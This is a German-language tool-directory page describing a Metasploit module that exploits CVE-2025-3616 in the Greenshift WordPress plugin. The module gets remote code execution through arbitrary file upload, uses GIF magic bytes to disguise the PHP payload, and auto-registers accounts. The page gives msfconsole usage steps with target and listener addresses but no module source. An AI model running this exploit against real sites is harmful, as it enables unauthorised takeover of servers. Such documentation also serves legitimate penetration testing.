Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/b4d-53ct0r/cve-2025-3616
Exploit-FrameworksSchwachstellenanalyseWebanwendungs-ExploitationPenetrationstestsAuthentifizierungPayload-Entwicklung
GitHubb4d-53ct0r/cve-2025-3616

CVE-2025-3616

Metasploit-Modul, das beliebigen Datei-Upload im Greenshift WordPress-Plugin (CVE-2025-3616) ausnutzt, um RCE über MIME-Spoofing zu erreichen, mit automatischer Registrierung und Nonce-Extraktion.

Repository anzeigen
12vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Metasploit-Modul: Greenshift WordPress Plugin – Beliebiges Datei-Upload (CVE-2025-3616)

Dieses Repository enthält ein Metasploit-Modul zur Ausnutzung von CVE-2025-3616, einer Schwachstelle für beliebiges Datei-Upload im Greenshift WordPress Plugin (Versionen 11.4 bis 11.4.5).

Der Exploit ermöglicht authentifizierten Benutzern (Subscriber+) das Hochladen beliebiger Dateien, was zu Remote Code Execution (RCE) führt. Er umgeht die Dateityp-Validierung des Plugins, indem er den MIME-Typ mittels GIF-Magic-Bytes (GIF89a;) fälscht.

Funktionen

  • Authentifizierungshandhabung: Unterstützt Login mit vorhandenen Anmeldedaten (USERNAME/PASSWORD).
  • Auto-Registrierung: Enthält eine REGISTER-Option, um automatisch einen neuen Benutzer zu registrieren und die Schwachstelle mit den frischen Session-Cookies auszunutzen (nützlich, wenn die Registrierung auf dem Ziel aktiviert ist).
  • Nonce-Extraktion: Extrahiert automatisch das erforderliche wp_rest-Nonce aus dem administrativen Dashboard.
  • Sicherheitsumgehung: Fügt GIF-Magic-Bytes zum PHP-Payload hinzu, um die finfo_file()-Überprüfung zu umgehen.

Installation

  1. Stellen Sie sicher, dass das Metasploit-Framework installiert ist.

  2. Kopieren Sie wp_greenshift_file_upload.rb in Ihr lokales Module-Verzeichnis:

    mkdir -p ~/.msf4/modules/exploits/unix/webapp/
    cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
    
  3. Starten Sie msfconsole und laden Sie die Module neu:

    msfconsole
    msf6 > reload_all
    

Verwendung

1. Verwendung der Auto-Registrierung (Empfohlen)

Wenn die Benutzerregistrierung auf dem Ziel aktiviert ist, benötigen Sie keine Anmeldedaten.

use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER true
run

2. Verwendung vorhandener Anmeldedaten

Wenn Sie bereits einen gültigen Benutzer (Subscriber oder höher) haben:

use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER false
set USERNAME <USER>
set PASSWORD <PASS>
run

Optionen

OptionErforderlichBeschreibung
RHOSTSjaDie Zieladresse
LHOSTjaDie Lauschadresse (Ihre IP)
REGISTERneinAuf true setzen, um automatisch ein neues Konto zu registrieren (Standard: false)
USERNAMEneinWordPress-Benutzername (erforderlich, wenn REGISTER false ist)
PASSWORDneinWordPress-Passwort (erforderlich, wenn REGISTER false ist)
EMAILneinE-Mail für die Registrierung (optional, wird bei Leerheit automatisch generiert)

Haftungsausschluss

Dieses Modul dient nur zu Bildungszwecken und autorisierten Penetrationstests. Die Verwendung dieses Codes zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal.

Tool herunterladen